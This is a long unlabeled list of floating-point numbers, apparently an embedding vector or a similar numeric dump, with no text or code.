0.01445131003856659, -0.018375353887677193, -0.009999549016356468, -0.0016947813564911485, 0.03307022526860237, -0.004739298950880766, 0.0240855161100626, -0.013362049125134945, 0.005368499085307121, 0.0031324701849371195, 0.02313833311200142, 0.0030732713639736176, -0.007279779762029648, -0.0038124124985188246, 0.02116278000175953, -0.025181543081998825, -0.012949347496032715, 0.02083803154528141, 0.0003105830692220479, 0.029633304104208946, 0.020689187571406364, 0.010493436828255653, -0.004641197621822357, 0.03344909846782684, 0.006826484575867653, -0.01321997120976448, -0.008781741373240948, -0.03653420880436897, -0.00891705323010683, -0.015263181179761887, 0.03198773041367531, 0.008369040675461292, 0.009661268442869186, -0.0027316086925566196, -0.0039037480019032955, 0.003137544495984912, 0.023368362337350845, -0.00947183184325695, 0.02911911904811859, -0.02442379668354988, 0.03231247887015343, 0.009316223673522472, -0.055694375187158585, 0.03450453281402588, 0.02301655150949955, 0.003052974585443735, 0.016711018979549408, -0.01852419786155224, -0.031933605670928955, -0.042514994740486145, -0.054124753922224045, -0.015222587622702122, -0.02470795065164566, -0.005371882114559412, 0.0245455764234066, -0.0023036848288029432, 0.011907446198165417, -0.028442559763789177, -0.04262324422597885, -0.004035677295178175, 0.007699246518313885, -0.05818411335349083, 0.03369266167283058, -0.0035823823418468237, -0.016859861090779305, -0.006904289126396179, 0.007442153990268707, 0.0005560473073273897, 0.00015085161430761218, 0.034315094351768494, -0.013673266395926476, 0.0074556851759552956, -0.049848899245262146, -0.00730007654055953, 0.0011924359714612365, -0.033286724239587784, 0.023855486884713173, -0.008260791189968586, 0.021257497370243073, -0.00996572058647871, -0.018686572089791298, -0.02696765959262848, 0.024721482768654823, 0.03750845417380333, 0.0031578412745147943, 0.001331976382061839, -0.010033376514911652, 0.008477290160953999, 0.04497767239809036, -0.007090343162417412, -0.009810112416744232, 0.017360515892505646, 0.011413557454943657, 0.02533038519322872, 0.000347582419635728, -0.0027434485964477062, -0.010229579173028469, -0.005094492807984352, -0.025546884164214134, -0.041486624628305435, 0.009938658215105534, 0.030120426788926125, -0.02911911904811859, 0.010500202886760235, 0.011927743442356586, 0.017671732231974602, 0.006968562491238117, -0.030851110816001892, -0.007848089560866356, 0.012178069911897182, 0.0391051359474659, -0.019403723999857903, 0.014194217510521412, -0.0002778122143354267, -0.02059447020292282, 0.010101032443344593, -0.0005852238973602653, -0.015344368293881416, -0.030824048444628716, 0.02668350376188755, 0.006004465278238058, 0.002515109721571207, -0.05320463329553604, -0.012644896283745766, 0.029416805133223534, -0.0029684046749025583, -0.00013044911611359566, 0.018618915230035782, 0.034450408071279526, -0.04035000503063202, 0.0010469757253304124, 0.006968562491238117, 0.006569392047822475, -0.010060438886284828, 0.01154886931180954, -0.021054530516266823, 0.01445131003856659, 0.018848946318030357, -0.0013522731605917215, -0.011677416041493416, -0.008335212245583534, -0.01171800959855318, 0.004049208480864763, 0.029389742761850357, 0.005740606691688299, 0.024234360083937645, 0.017604077234864235, -0.008632898330688477, 0.018754227086901665, 0.007056515198200941, -0.03842857480049133, 0.01795588806271553, 0.03101348504424095, 0.012103648856282234, 0.011291776783764362, -0.020405033603310585, 0.00790898036211729, -0.012820801697671413, -0.016697486862540245, 0.015601460821926594, 0.01266519259661436, -0.010567858815193176, 0.024315547198057175, 0.00402552867308259, 0.03853682428598404, -0.013673266395926476, 0.028767308220267296, 0.016643362119793892, -0.006156690884381533, -0.005155383143573999, -0.014857245609164238, -0.02593928948044777, -0.0228135846555233, -0.017766451463103294, 0.012286319397389889, 0.012671958655118942, -0.023828424513339996, 0.01346353255212307, 0.015790898352861404, 0.0009277321514673531, 0.008558477275073528, -0.014776058495044708, -0.016711018979549408, -0.001077420893125236, -0.006288620177656412, -0.0008182140882126987, -0.029092056676745415, 0.027481844648718834, -0.000647805689368397, 0.0028922916390001774, -0.008517883718013763, 0.048116907477378845, -0.01229308545589447, 0.00569324754178524, -0.04286680743098259, 0.000971708504948765, -0.02742771990597248, -0.025222135707736015, -0.001710849697701633, 0.026669973507523537, 0.009979251772165298, 0.0016203598352149129, 0.0004162954865023494, -0.005422623828053474, -0.01052049919962883, 0.012049524113535881, 0.025357447564601898, 0.010188985615968704, 0.009498894214630127, -0.029010869562625885, 0.0035248748026788235, 0.012604302726686, -0.03661539778113365, 0.032556042075157166, -0.02993099018931389, -0.001448682858608663, -0.005202742293477058, 0.0029836271423846483, 0.00012759488890878856, -0.019674349576234818, -0.028929682448506355, -0.0006981247570365667, 0.030607549473643303, -0.010946732014417648, 0.02380136214196682, -0.014356591738760471, -3.633864054108926e-8, 0.0020584322046488523, -0.020865093916654587, -0.004431464243680239, -0.03155473247170448, 0.005936809349805117, -0.0035214920062571764, 0.014559559524059296, -0.023990798741579056, 0.02269180305302143, 0.02001262828707695, 0.03204185515642166, -0.00394434155896306, -0.026412880048155785, -0.026900002732872963, 0.006075503770262003, 0.0006545712822116911, -0.034531593322753906, 0.002635199110955, 0.003548554377630353, 0.04200081154704094, -0.012441928498446941, 0.01190068107098341, -0.03618239983916283, -0.0008473906782455742, -0.005195976700633764, -0.03190654516220093, -0.03155473247170448, -0.020567407831549644, -0.0055816154927015305, 0.014261873438954353, -0.010980559512972832, 0.0003435653343331069, -0.008585539646446705, -0.029795678332448006, 0.0033760315272957087, -0.0011146316537633538, -0.03566821292042732, -0.0028956744354218245, -0.022705335170030594, -0.034829281270504, -0.004854314029216766, -0.016278021037578583, 0.00633259629830718, -0.018754227086901665, 0.014167155139148235, 0.016250958666205406, 0.011833025142550468, -0.014884307980537415, 0.014491903595626354, 0.0023899462539702654, -0.03940282389521599, -0.031148796901106834, 0.0023138332180678844, -0.008903522044420242, -0.0010867236414924264, 0.03022867627441883, -0.016318613663315773, -0.007212123833596706, -0.04086419194936752, 0.0234766136854887, 0.009992782957851887, -0.003548554377630353, -0.006863695569336414, -0.016562175005674362, 0.0046547288075089455, -0.011805962771177292, -0.019295474514365196, 0.017563482746481895, -0.0013886382803320885, -0.02137927897274494, -0.01268548984080553, 0.03626358509063721, 0.01515493169426918, 0.03141942247748375, 0.0006072120741009712, 0.024450859054923058, 0.013057596981525421, -0.025709258392453194, -0.011731540784239769, -0.0022918451577425003, -0.0396193228662014, -0.015019619837403297, 0.04300211742520332, 0.007144467905163765, 0.022448241710662842, -0.018618915230035782, 0.004116864409297705, 0.02643994241952896, -0.017468765377998352, 0.013233502395451069, 0.029416805133223534, 0.0012803887948393822, -0.013673266395926476, -0.016237426549196243, 0.002012764336541295, 0.014776058495044708, 0.0017827341798692942, -0.011481213383376598, -0.018497135490179062, -0.017509358003735542, -0.024274952709674835, 0.01939019374549389, 0.052149202674627304, 0.01389653142541647, -0.011427088640630245, -0.0021057913545519114, 0.0015197216998785734, 0.000045984899770701304, -0.0012076585553586483, -0.019836723804473877, -0.025303322821855545, 0.0007831175462342799, 0.02597988210618496, -0.004627666436135769, 0.018226511776447296, 0.018375353887677193, -0.01235397532582283, 0.01650805026292801, 0.010033376514911652, 0.04365161433815956, -0.034071534872055054, 0.003017455106601119, -0.01737404614686966, -0.005250101443380117, -0.011082043871283531, 0.02561454102396965, -0.012834332883358002, -0.012895222753286362, 0.004965946543961763, 0.023314237594604492, 0.019241349771618843, 0.0036703350488096476, -0.014275404624640942, -0.006731766276061535, 0.013429705053567886, -0.009972486644983292, 0.013050831854343414, -0.006528798490762711, -0.041946686804294586, 0.03439628332853317, 0.04170312359929085, 0.006853547412902117, -0.009187676943838596, 0.0015882232692092657, -0.0036804834380745888, 0.02487032487988472, 0.017346983775496483, 0.007726308889687061, 0.010412249714136124, -0.026467004790902138, 0.022015243768692017, -0.03834738954901695, 0.03997113183140755, -0.01091290358453989, 0.011332370340824127, -0.021690495312213898, -0.012529880739748478, -0.04032294452190399, -0.00838257186114788, 0.010919669643044472, -0.009248567745089531, 0.011663884855806828, -0.013314689509570599, -0.03182535618543625, -0.020986873656511307, -0.0022732396610081196, -0.005422623828053474, 0.004516034387052059, 0.006312299519777298, 0.005713544320315123, 0.011474448256194592, 0.007942807860672474, -0.012874926440417767, -0.007814262062311172, 0.027603626251220703, -0.015466148965060711, -0.016196833923459053, -0.0034352305810898542, 0.011535338126122952, -0.030039239674806595, -0.01852419786155224, -0.010811420157551765, -0.019917910918593407, -0.00427247304469347, -0.017604077234864235, -0.007563934661448002, 0.0023984031286090612, -0.030336925759911537, 0.010182219557464123, -0.011826259084045887, -0.012381037697196007, -0.015303774736821651, -0.01348382979631424, 0.0028855260461568832, -0.0008182140882126987, 0.018212979659438133, 0.017198141664266586, 0.08162013441324234, -0.013774750754237175, 0.011203824542462826, -0.019755536690354347, -0.010432546958327293, 0.012408100068569183, 0.021839339286088943, -0.00782102718949318, 0.020702719688415527, -0.003416625317186117, 0.00036513066152110696, 0.017306391149759293, 0.008145775645971298, 0.01451896596699953, 0.0070294528268277645, 0.019336069002747536, -0.021392809227108955, -0.015019619837403297, 0.027360064908862114, 0.006264940369874239, 0.004647963214665651, 0.013098190538585186, -0.007489513140171766, -0.003978169523179531, 0.01515493169426918, -0.012956113554537296, -0.004854314029216766, -0.029633304104208946, -0.032556042075157166, -0.015763835981488228, 0.008707320317626, -0.005195976700633764, -0.026737628504633904, -0.008565242402255535, -0.00020328497339505702, 0.0234766136854887, 0.011149699799716473, 0.0015264872927218676, -0.01642686314880848, -0.0344233438372612, -0.02170402742922306, -0.017563482746481895, -0.01918722502887249, 0.017387578263878822, 0.010107798501849174, -0.008707320317626, -0.014491903595626354, 0.014884307980537415, -0.0332055389881134, 0.006968562491238117, 0.009755986742675304, -0.011129402555525303, 0.018253574147820473, 0.01667042449116707, 0.012374272570014, 0.0015620066551491618, -0.01680573634803295, -0.02817193605005741, -0.003005615435540676, -0.01650805026292801, -0.006566009484231472, -0.005916512571275234, -0.00813224446028471, 0.020080285146832466, -0.017265796661376953, -0.001095180632546544, -0.03336791321635246, 0.019498443230986595, -0.03499165549874306, 0.008490821346640587, 0.005794731434434652, -0.005862387828528881, 0.009377113543450832, 0.011393261142075062, -0.00025032699340954423, -0.02577691525220871, -0.008456992916762829, 0.013334986753761768, -0.02033737674355507, -0.005378647707402706, -0.0005484360153786838, 0.016629831865429878, -0.008044292218983173, 0.0002025449794018641, 0.0058826846070587635, 0.05106670781970024, -0.027738938108086586, 0.015574398450553417, 0.0032846960239112377, 0.0017675115959718823, -0.025722790509462357, 0.010493436828255653, 0.015303774736821651, -0.005781200248748064, 0.0159397404640913, 0.03282666578888893, 0.0009404176380485296, -0.02005322277545929, -0.018226511776447296, -0.009194443002343178, 0.0018977492582052946, 0.007374498061835766, -0.004170989152044058, 0.0003059317241422832, -0.023111270740628242, 0.011400026269257069, 0.015845023095607758, -0.012678723782300949, -0.000993696739897132, -0.009539487771689892, -0.01976906694471836, -0.0030986422207206488, 0.02269180305302143, -0.013470298610627651, -0.017414640635252, 0.01753642037510872, -0.0012186527019366622, -0.013950656168162823, -0.015601460821926594, -0.006593071855604649, -0.02593928948044777, 0.005392178893089294, 0.02013440988957882, -0.03063461184501648, 0.01610211469233036, 0.0040153805166482925, 0.035316403955221176, -0.029064994305372238, 0.018754227086901665, -0.005906363949179649, 0.028523746877908707, 0.0006177833420224488, 0.014694871380925179, 0.00876821018755436, 0.016440395265817642, -0.02849668450653553, 0.02363898791372776, 0.004042442888021469, -0.002961639082059264, 0.0032965359278023243, -0.012570474296808243, 0.01878128945827484, 0.00040720420656725764, 0.003934193402528763, 0.004647963214665651, 0.007563934661448002, -0.006478056777268648, 0.011954805813729763, 0.014424247667193413, -0.0071715302765369415, 0.012035992927849293, -0.023381894454360008, 0.011142933741211891, 0.01886247657239437, 0.008666726760566235, -0.014951963908970356, -0.003545171581208706, -0.029876865446567535, -0.01037842221558094, 0.01381534431129694, -0.00011712935520336032, 0.009742455556988716, -0.0025286409072577953, -0.008646429516375065, 0.007848089560866356, 0.019336069002747536, -0.009011771529912949, -0.032258354127407074, -0.013477063737809658, 0.002697780728340149, 0.01445131003856659, 0.004928735550493002, -0.016995172947645187, 0.0032491767778992653, 0.0011408483842387795, 0.02984980307519436, 0.004949032329022884, -0.0024085515178740025, 0.04963240027427673, -0.018023543059825897, 0.0042826212011277676, -0.013639437966048717, 0.0032271884847432375, 0.015046682208776474, -0.0009903139434754848, -0.009674799628555775, -0.018212979659438133, 0.018673039972782135, -0.0404311940073967, 0.020188534632325172, 0.010872310027480125, 0.023070676252245903, -0.010121329687535763, -0.010709935799241066, 0.02684587799012661, -0.03371972218155861, 0.009275630116462708, -0.026006944477558136, -0.006444228813052177, -0.010669342242181301, -0.0034910468384623528, -0.004448378458619118, -0.004455144051462412, 0.00521965604275465, -0.009451535530388355, -0.01634567603468895, -0.004850930999964476, 0.013510892167687416, -0.004982860293239355, 0.015696179121732712, -0.014694871380925179, 0.0025201840326189995, -0.0029870099388062954, 0.0020838030613958836, 0.032014794647693634, -0.0005522416322492063, -0.006488204933702946, -0.024802669882774353, 0.0007311070221476257, -0.013497360982000828, 0.0028111045248806477, -0.003071579849347472, -0.01531730592250824, 0.0069820936769247055, -0.01500608865171671, -0.004850930999964476, 0.02083803154528141, -0.0161427091807127, -0.005077578593045473, 0.011379729956388474, -0.02293536439538002, -0.017157547175884247, -0.01259753666818142, 0.006065355613827705, -0.021216904744505882, -0.01531730592250824, 0.016697486862540245, 0.019078975543379784, -0.0013565017143264413, 0.012475755997002125, 0.004478823393583298, 0.01101438794285059, -0.020608000457286835, -0.022908302024006844, -0.014613684266805649, -0.00011131517385365441, 0.01083171647042036, 0.005933426320552826, -0.0020719633903354406, 0.012083351612091064, 0.0009285778505727649, -0.0031257045920938253, 0.007861620746552944, -0.011975102126598358, -0.004343511536717415, 0.017982950434088707, -0.013842406682670116, -0.021528121083974838, -0.010493436828255653, 0.00219205254688859, 0.02330070734024048, -0.024883856996893883, -0.010317531414330006, 0.010872310027480125, -0.03353028744459152, 0.017428170889616013, -0.027373595163226128, -0.002379797864705324, -0.0025573947932571173, 0.004986243322491646, 0.02537097968161106, -0.0019451084081083536, -0.006637047976255417, -0.019904378801584244, -0.005277163814753294, 0.004079653415828943, 0.0058488561771810055, -0.00757746584713459, -0.003453836077824235, -0.0004604832793120295, -0.01733345352113247, 0.0011120946146547794, 0.02911911904811859, -0.02577691525220871, 0.018253574147820473, -0.028550809249281883, -0.027820125222206116, -0.001063044066540897, -0.03653420880436897, -0.004976094700396061, 0.010229579173028469, 0.02372017502784729, 0.0016144399996846914, -0.0240855161100626, 0.034856341779232025, 0.00469532236456871, -0.01301023829728365, 0.039917007088661194, -0.002890600124374032, -0.00884939730167389, -0.002780659357085824, 0.037237830460071564, -0.017441703006625175, -0.009810112416744232, 0.0027620538603514433, -0.0036297414917498827, -0.014234811067581177, -0.004008614923804998, 0.008037526160478592, 0.005409092642366886, -0.0296874288469553, 0.0038462404627352953, -0.03344909846782684, -0.007489513140171766, 0.009843939915299416, -0.021352216601371765, -0.0102092819288373, 0.0014131634961813688, -0.02857787162065506, 0.01565558649599552, 0.012381037697196007, -0.012874926440417767, -0.013422938995063305, -0.03128410875797272, -0.014938432723283768, -0.011914212256669998, 0.013213206082582474, -0.00718506146222353, 0.017901763319969177, -0.009438004344701767, 0.04790040850639343, 0.0004727459163405001, 0.033827971667051315, -0.004976094700396061, 0.00029366908711381257, 0.001434306032024324, 0.020391501486301422, 0.0006934734410606325, 0.00034927381784655154, -0.014058905653655529, -0.03796851634979248, 0.01910603791475296, -0.008795272558927536, -0.014965495094656944, -0.00008758273179410025, -0.004083036445081234, 0.0015899146674200892, 0.0048610796220600605, -0.013680032454431057, -0.025127418339252472, -0.012468990869820118, -0.008423165418207645, 0.024112578481435776, 0.02206936851143837, -0.00458030728623271, 0.014870776794850826, -0.0024508365895599127, -0.003337129484862089, 0.021528121083974838, -0.017847638577222824, 0.003883451223373413, -0.001142539782449603, -0.03344909846782684, 0.014532497152686119, 0.008977944031357765, -0.03196066990494728, -0.004516034387052059, 0.021338684484362602, -0.014031843282282352, -0.010567858815193176, 0.005016688257455826, -0.005243335850536823, 0.008991475217044353, 0.004698705393821001, 0.0027671281713992357, 0.0056763337925076485, 0.028469622135162354, -0.029552116990089417, -0.0270894393324852, 0.030580487102270126, -0.01154886931180954, -0.0234224870800972, 0.004011997487396002, 0.00823372881859541, -0.00782779324799776, -0.005649271421134472, -0.000924349355045706, -0.004296152386814356, -0.024112578481435776, 0.006400252226740122, 0.014275404624640942, 0.03317847475409508, 0.016278021037578583, 0.0066167511977255344, -0.002795881824567914, -0.0014131634961813688, -0.004566776100546122, 0.0054868971928954124, -0.019295474514365196, -0.018212979659438133, 0.006325830705463886, -0.022583553567528725, -0.02392314188182354, 0.017428170889616013, 0.00885616336017847, 0.011413557454943657, -0.029497992247343063, -0.03039105050265789, 0.03672364726662636, -0.020486220717430115, -0.014897839166224003, 0.006061972584575415, -0.019877316430211067, -0.008044292218983173, -0.016738081350922585, -0.00924180168658495, -0.00610594917088747, 0.029497992247343063, 0.0009953881381079555, -0.010019845329225063, 0.022921834141016006, -0.007212123833596706, -0.00926209893077612, -0.013314689509570599, -0.0046242838725447655, -0.0005467446171678603, -0.014072436839342117, 0.0027654366567730904, -0.01165035367012024, -0.003188286442309618, 0.00009709685400594026, -0.0014672883553430438, 0.007164764683693647, -0.008761445060372353, 0.032556042075157166, -0.007320373319089413, -0.004258941859006882, -0.012617833912372589, -0.012780208140611649, 0.009086193516850471, 0.019322536885738373, -0.004526182543486357, 0.005635740235447884, -0.017874700948596, -0.011285011656582355, 0.010479905642569065, -0.02589869499206543, -0.01634567603468895, 0.0008110256167128682, -0.020120877772569656, 0.009485363028943539, -0.005361733492463827, 0.010121329687535763, 0.020621532574295998, -0.013030534610152245, 0.008260791189968586, -0.0004782429605256766, 0.001496042124927044, -0.003595913527533412, -0.02553335390985012, 0.031202921643853188, -0.01531730592250824, 0.016494520008563995, 0.01523611880838871, 0.006457759998738766, 0.013923593796789646, 0.00491182180121541, -0.008409634232521057, -0.011623291298747063, -0.004286004230380058, 0.01964728720486164, -0.002599679632112384, 0.018808351829648018, -0.004130395594984293, -0.00939064472913742, -0.008044292218983173, -0.015831490978598595, -0.00963420607149601, 0.003555319970473647, -0.0020618150010704994, -0.00941094197332859, 0.022908302024006844, -0.0025607775896787643, 0.010635514743626118, -0.008957646787166595, -0.0047663613222539425, -0.010141626000404358, -0.012313381768763065, 0.004468675237149, -0.0038157952949404716, 0.0011053290218114853, -0.010161923244595528, 0.017942355945706367, 0.01943078637123108, 0.02095981128513813, -0.006623516790568829, 0.01650805026292801, 0.01667042449116707, 0.012076586484909058, 0.017279328778386116, -0.0060721212066709995, -0.012279554270207882, -0.00238825473934412, -0.01696811057627201, 0.021352216601371765, 0.015885615721344948, -0.01638627052307129, 0.004431464243680239, 0.024532046169042587, -0.013855937868356705, 0.0029210452921688557, 0.0031764465384185314, -0.012651661410927773, -0.005179062485694885, -0.01572324149310589, 0.005040368065237999, -0.0014842023374512792, 0.007692480925470591, -0.014248342253267765, -0.008808803744614124, -0.004346894565969706, 0.0033185239881277084, 0.01075052935630083, -0.023327769711613655, -0.010182219557464123, 0.0015349442837759852, 0.018591852858662605, -0.02051328308880329, -0.006444228813052177, -0.008511117659509182, 0.011846556328237057, 0.010872310027480125, -0.009600378572940826, -0.007435388397425413, 0.011555635370314121, 0.001605137251317501, 0.017807044088840485, -0.010419015772640705, 0.0016203598352149129, -0.012895222753286362, 0.009235036559402943, -0.013781515881419182, -0.009248567745089531, 0.01499255746603012, 0.0047494471073150635, -0.023666050285100937, 0.0002924005384556949, -0.009559785015881062, -0.002850006567314267, 0.01634567603468895, 0.0042352620512247086, 0.007861620746552944, 0.009106489829719067, 0.008700554259121418, 0.010053673759102821, -0.012090117670595646, -0.004783275071531534, -0.00009841825522016734, 0.002227572025731206, -0.007536872290074825, 0.002682558260858059, 0.02597988210618496, 0.029795678332448006, -0.001747214817442, 0.0009480289299972355, 0.020540345460176468, -0.010351359844207764, -0.017062829807400703, -0.014857245609164238, -0.0052873119711875916, 0.0058556217700243, 0.006961796898394823, -0.0020279870368540287, 0.0056120604276657104, -0.006342744920402765, 0.025682196021080017, 0.020350908860564232, -0.013991249725222588, -0.021798744797706604, 0.00807135459035635, 0.014343060553073883, -0.014721933752298355, -0.0014715167926624417, -0.011805962771177292, -0.015357899479568005, -0.006812953390181065, 0.004834017250686884, -0.006927968934178352, -0.01898425817489624, -0.00407627085223794, 0.004373956937342882, 0.013037300668656826, -0.022461773827672005, 0.023463081568479538, -0.003541788784787059, 0.0006850164500065148, -0.011941274628043175, -0.017604077234864235, 0.0016719475388526917, 0.03125704824924469, -0.001033444539643824, 0.007097108755260706, 0.01964728720486164, -0.009221505373716354, -0.009607143700122833, 0.0046242838725447655, 0.02009381540119648, -0.019254881888628006, 0.026453474536538124, -0.014965495094656944, -0.008693789131939411, 0.0014072436606511474, -0.003096950938925147, -0.013646204024553299, -0.006410400848835707, 0.011224120855331421, -0.012414866127073765, 0.0017455234192311764, -0.002158224582672119, -0.030851110816001892, 0.0005957951652817428, -0.011521806940436363, 0.015249649994075298, -0.008896756917238235, 0.008802038617432117, -0.006572775077074766, 0.004360425751656294, -0.023408956825733185, -0.003068197052925825, 0.01811826229095459, 0.002552320482209325, 0.002369649475440383, -0.004685174208134413, -0.00014144320448394865, -0.01259753666818142, 0.03607415035367012, -0.01997203566133976, 0.006850164383649826, -0.014072436839342117, -0.0019349600188434124, -0.005507193971425295, -0.011318839155137539, -0.026155788451433182, -0.0019163546385243535, -0.021609308198094368, 0.018267104402184486, -0.00017643401224631816, 0.0005636585992760956, 0.021176310256123543, 0.038266200572252274, -0.007286545354872942, 0.008957646787166595, -0.02911911904811859, -0.002329055918380618, 0.003636507084593177, -0.013652969151735306, -0.0030935681425035, 0.013883000239729881, 0.005510576535016298, 0.01500608865171671, 0.029064994305372238, 0.01763113960623741, -0.014979026280343533, 0.0030360606033354998, 0.004181137308478355, -0.01035812497138977, -0.020648594945669174, -0.005260249599814415, -0.0020212214440107346, 0.004127012565732002, 0.010676108300685883, 0.01523611880838871, -0.00790898036211729, -0.015506742522120476, -0.03729195520281792, -0.015506742522120476, -0.0054868971928954124, -0.005615443456918001, 0.0023611923679709435, 0.006995624862611294, -0.015669116750359535, 0.00004733273453894071, -0.010906138457357883, -0.0051925936713814735, 0.0036635694559663534, 0.0010207591112703085, -0.003825943684205413, 0.005280546378344297, -0.008937350474298, -0.028361372649669647, 0.017888231202960014, 0.006890757940709591, 0.01700870506465435, -0.0009311149478890002, -0.004938884172588587, -0.032961975783109665, -0.02277299016714096, 0.022339992225170135, 0.0027789678424596786, 0.006363041698932648, 0.016196833923459053, -0.0040931846015155315, -0.005310991778969765, 0.0044652922078967094, -0.005324522964656353, -0.00316629814915359, -0.0054868971928954124, -0.00916061457246542, 0.00773984007537365, 0.005094492807984352, -0.003195052035152912, -0.0063089169561862946, 0.012523115612566471, 0.011975102126598358, -0.0069178203120827675, 0.011778900399804115, 0.00813224446028471, 0.012218663468956947, 0.017279328778386116, -0.009918361902236938, -0.01680573634803295, 0.01146768219769001, 0.0018030309583991766, -0.046926163136959076, 0.015926210209727287, 0.0120427580550313, 0.0048137204721570015, -0.010087501257658005, -0.01910603791475296, -0.006721618119627237, -0.000050319107685936615, 0.015127869322896004, 0.021879931911826134, 0.006542329676449299, -0.000022807453206041828, -0.01083171647042036, 0.016115646809339523, -0.025790445506572723, -0.017779981717467308, -0.02432907745242119, 0.033746786415576935, 0.010635514743626118, -0.010243110358715057, -0.0037278425879776478, -0.010263406671583652, 0.01389653142541647, -0.01006720494478941, 0.005216273479163647, 0.0007962259114719927, 0.004617518279701471, -0.00909972470253706, 0.018970726057887077, -0.017509358003735542, -0.02639934979379177, 0.015330837108194828, -0.0008110256167128682, -0.002432231092825532, 0.015709711238741875, -0.010885841213166714, -0.004928735550493002, 0.017238734290003777, 0.023287175223231316, 0.001339587732218206, 0.026331692934036255, 0.012888457626104355, 0.0027908077463507652, -0.002871994860470295, -0.014383654110133648, -0.003964638337492943, -0.005710161756724119, -0.0191466324031353, -0.0029903927352279425, 0.03512696549296379, -0.000997079536318779, 0.022678272798657417, 0.01733345352113247, -0.0007598608499392867, -0.007936042733490467, 0.01123765204101801, -0.020486220717430115, 0.007198592647910118, -0.00469532236456871, -0.0330972895026207, 0.009810112416744232, 0.04854990541934967, -0.014383654110133648, -0.01836182363331318, -0.012462224811315536, 0.0002558240375947207, -0.020770374685525894, -0.0047494471073150635, -0.021068060770630836, 0.01171800959855318, 0.0058657703921198845, -0.0064340801909565926, -0.006264940369874239, 0.011278245598077774, -0.006180370692163706, 0.007868386805057526, 0.0076857153326272964, -0.012759910896420479, -0.038807447999715805, -0.02330070734024048, -0.025262730196118355, 0.023828424513339996, 0.0262775681912899, 0.011400026269257069, 0.0005721155903302133, 0.003558702766895294, -0.004421316087245941, -0.013883000239729881, 0.011805962771177292, -0.012266023084521294, 0.012793739326298237, 0.01646745763719082, -0.008734382688999176, 0.0005771897849626839, 0.01235397532582283, 0.02116278000175953, -0.006599837448447943, -0.004752830136567354, -0.015993865206837654, 0.013612375594675541, 0.005804880056530237, -0.0009953881381079555, -0.022867709398269653, -0.009478597901761532, -0.024640295654535294, 0.0023087591398507357, -0.0058184112422168255, 0.0060247620567679405, -0.0020550494082272053, 0.00205335789360106, 0.0003129087563138455, -0.023666050285100937, -0.011914212256669998, -0.01733345352113247, -0.023151863366365433, 0.0008786816033534706, 0.01130530796945095, -0.0172116719186306, -0.005791348870843649, 0.011278245598077774, 0.0038462404627352953, -0.014532497152686119, -0.02606106922030449, -0.004353660158813, -0.012313381768763065, -0.018010012805461884, -0.01356501691043377, 0.009580081328749657, 0.004945649765431881, -0.00626832339912653, 0.008335212245583534, 0.022989489138126373, -0.012624599039554596, 0.006873844191431999, -0.032637227326631546, -0.030499299988150597, -0.008078119717538357, 0.007996932603418827, 0.0029684046749025583, -0.005294077564030886, -0.0069347345270216465, 0.0026182851288467646, -0.028956744819879532, -0.005919895134866238, 0.021433403715491295, -0.010554327629506588, -0.013950656168162823, 0.015614992007613182, 0.009580081328749657, 0.00014715167344547808, 0.023977266624569893, 0.022962426766753197, -0.011535338126122952, -0.011372963897883892, 0.01610211469233036, -0.03377384692430496, 0.005168914329260588, 0.010182219557464123, -0.012611067853868008, -0.02051328308880329, 0.009769518859684467, -0.006748680491000414, 0.014505434781312943, 0.006955031305551529, 0.024883856996893883, 0.01123765204101801, -0.00657954066991806, 0.005689864978194237, 0.014194217510521412, -0.024572638794779778, 0.034937530755996704, 0.019363131374120712, -0.009086193516850471, 0.01437012292444706, 0.0046242838725447655, 0.01363267283886671, 0.014857245609164238, 0.005980785470455885, 0.019241349771618843, -0.020567407831549644, 0.026385817676782608, 0.011264714412391186, 0.006867078598588705, -0.004837399814277887, -0.012049524113535881, 0.003147692885249853, 0.004258941859006882, 0.007929276674985886, 0.025316854938864708, 0.01874069683253765, -0.0042826212011277676, 0.00577443465590477, -0.0016567249549552798, -0.01585855334997177, -0.018997788429260254, 0.0012507892679423094, 0.008538180030882359, 0.02013440988957882, 0.01235397532582283, -0.022597085684537888, 0.005168914329260588, 0.005781200248748064, -0.013537954539060593, 0.03266429156064987, -0.0013277479447424412, -0.020851561799645424, -0.00025138413184322417, 0.011724775657057762, 0.013179377652704716, 0.00012326067371759564, 0.019904378801584244, -0.022015243768692017, 0.02676469087600708, -0.004553244914859533, -0.01292905118316412, -0.009113255888223648, -0.0013590387534350157, -0.012056289240717888, -0.0044822064228355885, 0.0037988813128322363, -0.007239186204969883, -0.024193765595555305, -0.021690495312213898, -0.010249875485897064, 0.0006795193767175078, 0.017807044088840485, 0.01068963948637247, 0.01642686314880848, 0.02668350376188755, -0.023936673998832703, -0.019836723804473877, -0.018632447347044945, -0.006045058835297823, -0.025100355967879295, 0.0154796801507473, 0.030661674216389656, -0.028198998421430588, -0.01315231528133154, -0.006752063054591417, -0.0028094130102545023, 0.01680573634803295, 0.014275404624640942, 0.008680257946252823, -0.033124350011348724, -0.0005928351893089712, -0.0035823823418468237, -0.000946337531786412, -0.005595146678388119, -0.0057541378773748875, 0.008822334930300713, -0.02442379668354988, 0.016372738406062126, 0.010013080202043056, -0.007814262062311172, -0.02178521454334259, -0.016007397323846817, -0.003825943684205413, -0.004170989152044058, -0.007868386805057526, -0.024883856996893883, -0.01476252730935812, -0.02055387571454048, -0.011027919128537178, 0.0030698885675519705, -0.0006266632117331028, 0.026128726080060005, -0.008903522044420242, 0.0076857153326272964, -0.008538180030882359, 0.02239411696791649, -0.015831490978598595, 0.015912678092718124, 0.004495737608522177, 0.012705786153674126, 0.004248793236911297, -0.0007332212990149856, -0.02162284031510353, 0.02178521454334259, -0.011677416041493416, 0.003501195227727294, 0.01886247657239437, -0.010419015772640705, -0.009796581231057644, 0.0166027694940567, 0.027238283306360245, 0.0012203441001474857, 0.0018808352760970592, 0.012110413983464241, 0.008416399359703064, -0.02569572813808918, 0.002158224582672119, 0.015384961850941181, -0.01976906694471836, -0.02589869499206543, 0.0017209980869665742, 0.005152000114321709, -0.003839474869892001, -0.005798114463686943, -0.0010376730933785439, -0.006454376969486475, -0.02684587799012661, -0.014573090709745884, -0.013592079281806946, -0.01658923737704754, -0.02186640165746212, 0.03293491527438164, 0.005747372284531593, 0.02388254925608635, 0.0013522731605917215, -0.0007374497945420444, 0.02903793193399906, 0.015209056437015533, 0.015344368293881416, -0.004252176266163588, 0.005737224128097296, 0.004269090015441179, -0.0017336836317554116, -0.0073609668761491776, -0.018889538943767548, -0.04689910262823105, 0.021920526400208473, 0.0046242838725447655, 0.010804654099047184, -0.016562175005674362, -0.010987325571477413, 0.015181994065642357, -0.00034990807762369514, -0.00510802399367094, 0.0025235668290406466, -0.012306616641581059, 